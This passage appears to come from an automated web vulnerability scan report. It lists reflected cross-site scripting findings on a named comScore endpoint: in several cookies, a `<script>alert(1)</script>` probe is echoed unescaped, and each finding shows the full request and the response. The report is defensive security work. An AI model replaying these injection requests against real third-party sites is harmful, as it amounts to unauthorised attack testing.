Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload bf9fd<script>alert(1)</script>5110cef4cdd was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172bf9fd<script>alert(1)</script>5110cef4cdd

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172bf9fd<script>alert(1)</script>5110cef4cdd', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=130
...[SNIP]...

3.64. http://ar.voicefive.com/bmx3/node.pli [ar_p101866669 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload 4a94d<script>alert(1)</script>10f1f070cd was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&4a94d<script>alert(1)</script>10f1f070cd; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16067

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
n Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&4a94d<script>alert(1)</script>10f1f070cd', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:
...[SNIP]...

3.65. http://ar.voicefive.com/bmx3/node.pli [ar_p101945457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload c69ed<script>alert(1)</script>b2a148cde76 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c69ed<script>alert(1)</script>b2a148cde76; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c69ed<script>alert(1)</script>b2a148cde76', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p
...[SNIP]...

3.66. http://ar.voicefive.com/bmx3/node.pli [ar_p104567837 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 61147<script>alert(1)</script>c2a90b6c6b1 was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&61147<script>alert(1)</script>c2a90b6c6b1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
ay 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&61147<script>alert(1)</script>c2a90b6c6b1', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.67. http://ar.voicefive.com/bmx3/node.pli [ar_p20101109 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload 35b87<script>alert(1)</script>ece85987799 was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&35b87<script>alert(1)</script>ece85987799; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&35b87<script>alert(1)</script>ece85987799', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...

3.68. http://ar.voicefive.com/bmx3/node.pli [ar_p56282763 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 8477b<script>alert(1)</script>014b6d8beb6 was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&8477b<script>alert(1)</script>014b6d8beb6; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&8477b<script>alert(1)</script>014b6d8beb6', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p
...[SNIP]...

3.69. http://ar.voicefive.com/bmx3/node.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 1e2f5<script>alert(1)</script>aaffd4b4831 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&1e2f5<script>alert(1)</script>aaffd4b4831; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&1e2f5<script>alert(1)</script>aaffd4b4831' };
